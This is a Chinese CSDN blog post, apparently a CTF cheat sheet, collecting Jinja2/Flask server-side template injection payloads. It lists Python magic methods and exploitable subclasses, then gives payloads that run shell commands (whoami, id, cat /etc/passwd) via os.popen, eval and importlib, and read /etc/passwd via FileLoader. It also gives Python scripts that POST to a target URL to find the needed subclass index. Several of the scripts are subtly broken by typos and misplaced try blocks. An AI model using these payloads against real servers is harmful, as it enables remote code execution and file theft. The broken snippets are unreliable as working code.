ctf ssti 各种payload与绕过(后续会补充 绕过)

已于 2023-06-07 12:12:01 修改
阅读量462 收藏 3
点赞数 1
文章标签: 网络安全 命令模式
于 2023-06-07 12:07:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59855041/article/details/131082320
版权

目录

各种魔术方法

常用注入模块

payload

         linecache类命令执行

frozen_importlib.BuiltinImporter (importlib类执行命令)

frozen_importlib_external.FileLoader (文件读取)

内建函数eval执行命令

os模块执行命令 (通过其他函数调用os模块)

各种魔术方法

__class__ 返回一个实例所属的类

__mro__ 查看类继承的所有父类,直到object

__subclasses__() 获取一个类的子类,返回的是一个列表

__bases__ 返回一个类直接所继承的类(元组形式)

__init__ 类实例创建之后调用, 对当前对象的实例的一些初始化

__globals__  使用方式是 函数名.__globals__,返回一个当前空间下能使用的模块,方法和变量的字典,与func_globals等价

__getattribute__ 当类被调用的时候,无条件进入此函数。

__getattr__ 对象中不存在的属性时调用

__dict__ 返回所有属性,包括属性,方法等

__builtins__ 方法是作为默认初始模块出现的,可用于查看当前所有导入的内建函数

常用注入模块

os. AddedDIIDirectory
os._wrap _close

frozen_importlib._DummyModuleLock

frozen_importlib._ModuleLockManager

frozen_importlib.ModuleSpeclei

frozen_importlib.BuiltinImporter
frozen_importlib_external.FileLoader
frozen_importlib_external._NamespacePath
frozen_importlib_external._NamespaceLoader
frozen_importlib_external.FileFinder
zipimport.zipimporter
zipimport._ZiplmportResourceReader
_sitebuiltins.Quitter
_sitebuiltins._Printer
warnings.WarningMessage
warnings.catch_warnings
weakref.finalize
pickle._Framer
pickle._Unframer
pickle._Pickler
pickle._Unpickler
jinja2.bccache.Bucket
jinja2.runtime.TemplateReference
jinja2.runtime.Context
jinja2.runtime.BlockReference
jinja2.runtime.LoopContext
jinja2.runtime.Macro
jinja2.runtime.Undefined
jinja2.environment.Environment
jinja2.environment.TemplateExpression
jinja2.environment.TemplateStream
dis.Bytecode

payload

linecache类命令执行

{{''.__class__.__base__.__subclasses__()[i].__init__.__ globals__['linecache']['os'].popen("Is -I /").read()}}
{{''.__class__.__base__.__subclasses__()[i].__init__.__ globals__.linecache.os.popen("Is -I /").read()}}

frozen_importlib.BuiltinImporter (importlib类执行命令)

{{[].__class__.__base__.__subclasses__()[i]["load_module"]("os")["popen"]("ls -l /opt").read()}}

import requests
url= input('请输入URL链接:')
for i in range(500):
    data = {"name":"{{().__class__.__base.__subclasser__()["+str(i)+"]}}"}
try:
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if '_frozen_importlib.BuiltinImporter' in response.text:
            #print(response.text)
            print(i)
except:
    pass

frozen_importlib_external.FileLoader (文件读取)

{{''.__class__.__base__.__subclasses__()[i]["get_data"](0,"/etc/passwd")}}

获取i值(其中name需要根据实际情况而定)

import requests
url= input('请输入URL链接:')
for i in range(500):
    data = {"name":"{{().__class__.__base.__subclasser__()["+str(i)+"]}}"}
try:
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if '_frozen_importlib_external.FileLoader' in response.text:
            #print(response.text)
            print(i)
except:
    pass

内建函数eval执行命令

{{().__class__.__base.__subclasser__()[i].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /etc/passwd").read()')}}

获取i值(其中name需要根据实际情况而定)

import requests
url= input('请输入URL链接:')
for i in range(500):
    data = {"name":"{{().__class__.__base.__subclasser__()["+str(i)+"].__init__.__globals__['__builtins__']}}"}
try:
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if 'eval' in response.text:
            #print(response.text)
            print(i)
except:
    pass

os模块执行命令 (通过其他函数调用os模块)

通过config,调用os
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

通过url_for,调用os
{{url_for.__globals__.os.popen('whoami').read()}}
在已经加载os模块的子类里直接调用os模块
{{''.__class__.__bases__ [0].__subclasses__()[i].__init__.__globals__['os'].popen("ls -l /opt").read()}}

{{''.__class__.__bases__ .__subclasses__()[i].__init__.__globals__os.popen('id').read()}}

获取i值(其中name需要根据实际情况而定)

import requests
url= input('请输入URL链接:')
for i in range(500):
    data = {"name":"{{().__class__.__base.__subclasser__()["+str(i)+"].__init__.__globals__}}"}
try:
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if 'os.py' in response.text:
            print(response.text)
            print(i)
except:
    pass

目录

各种魔术方法

常用注入模块

payload

linecache类命令执行

frozen_importlib.BuiltinImporter (importlib类执行命令)

frozen_importlib_external.FileLoader (文件读取)

内建函数eval执行命令

os模块执行命令 (通过其他函数调用os模块)

甯橗醭檬
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1671
ctfshow web
php中函数禁用绕过的原理与利用1
08-03
当这个限制过于严格,如在CTF挑战中,可能导致即使成功上传了Webshell也无法执行任何操作。在这种情况下,我们需要寻找绕过`disable_functions`的方法。 一种常见的绕过策略是利用符号链接(symlinks)。通过创建...
ssti-payloadSSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).conc
基于SSTI模块注入的常用payload总结
Welcome To Myon'Blog !
07-05 914
一、查找函数位置,利用函数实现 1、利用file函数进行读取 2、利用内嵌函数eval进行命令执行 3、利用linecache函数进行命令执行 二、查找类的位置,利用类下的函数实现 1、利用_frozen_importlib_external.FileLoader类 2、利用importlib类进行命令执行 3、利用subprocess.Popen类进行命令执行 三、利用os模块进行命令执行 1、利用config 2、利用url_for 3、利用子类的os模块 四、关于其他的利用
SSTI模板注入
Welcome To Myon'Blog !
07-04 896
1、原理简述 2、常用payload及相关脚本 函数调用、高危函数 3、实战:攻防世界 Web_python_template_injection
SSTIpayload构造思路
shawdow_bug的博客
04-24 2009
内置的方法和属性 有些对象类型内置了一些可读属性,它们不被dir()列举出来。 属性/方法 描述 instance._class_ 类实例所属的类 class._bases_ 类对象(类也是对象)的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表
密码爆破---绕过验证码进行登录爆破
04-14
3. 可以被绕过:攻击者可以使用自动化工具来绕过验证码,例如,使用机器学习算法来识别验证码。 绕过验证码的技术 绕过验证码的技术有多种,包括: 1. 使用 OCR 技术:使用 OCR 技术可以识别验证码,例如,使用 ...
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
整理自己做过的关于RealWorld的CTF赛题.zip
10-22
整理自己做过的关于RealWorld的CTF赛题
第十二节 XSS 过滤器绕过-01
09-15
XSS 过滤器绕过技术详解 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的 Web 应用程序安全漏洞,攻击者可以通过插入恶意脚本来盗取用户信息、破坏网站操作等。为防止 XSS 攻击,开发者通常使用 XSS 过滤...
CTF中Web各种题目的解题姿势PPT模板
02-21
CTF中Web各种题目的解题姿势PPT模板
SQL注入绕过的技巧总结
12-14
这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也变多。  一、引号绕过  使用到引号的地方是在于后的whe
sqlmap的一些脚本的使用,绕过滤的神器
11-26
sql注入神奇,搭配各种脚本,花式绕过滤,懂的人自然懂,哈哈,欢迎下载
CTF Web各种题目的解题姿势
07-27
课时2:SSRF限制绕过策略13'07 课时3:SSRF中可以使用的协议分析17'44 课时4:Linux基础知识21'37 课时5:Redis未授权访问漏洞利用与防御16'17 课时6:Redis未授权添加ssh密钥f17'04 第5章 第五章 课时1:XXE-...
CTF比赛的各种解题技巧
02-28
CTF比赛的各种解题技巧 CTF(Capture The Flag)是一种网络安全竞赛,旨在培养参与者的网络安全技能。CTF比赛涵盖了网络安全的多个方面,包括网络安全、Web安全、密码学、反汇编、逆向工程等。为了帮助参与者更好地...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 1706
SSTI总结:流程和绕过
探索 SSTI 攻击payload库:Payloadbox 的 SSTI Payloads
最新发布
gitblog_00036的博客
04-17 326
探索 SSTI 攻击payload库:Payloadbox 的 SSTI Payloads 项目地址:https://gitcode.com/payloadbox/ssti-payloads 在这个数字化的时代,安全是任何在线服务的基石。软件供应链中的漏洞(如 Server-Side Template Injection, 简称SSTI)是一种常见且危险的安全威胁。为了帮助开发者更好地识别和防御这...
CTF命令执行RCE
qq_53099119的博客
04-02 2629
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
2018强网杯CTF Web挑战解析:绕过与解密
在这种情况下,可以通过使用数组绕过,如`param1[]=1&param2[]=2`。由于PHP将数组转化为字符串时,将数组元素用逗号分隔,这样两个数组转化为字符串后就相等。这道题目的解题过程中还提到了这是一道来自去年...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值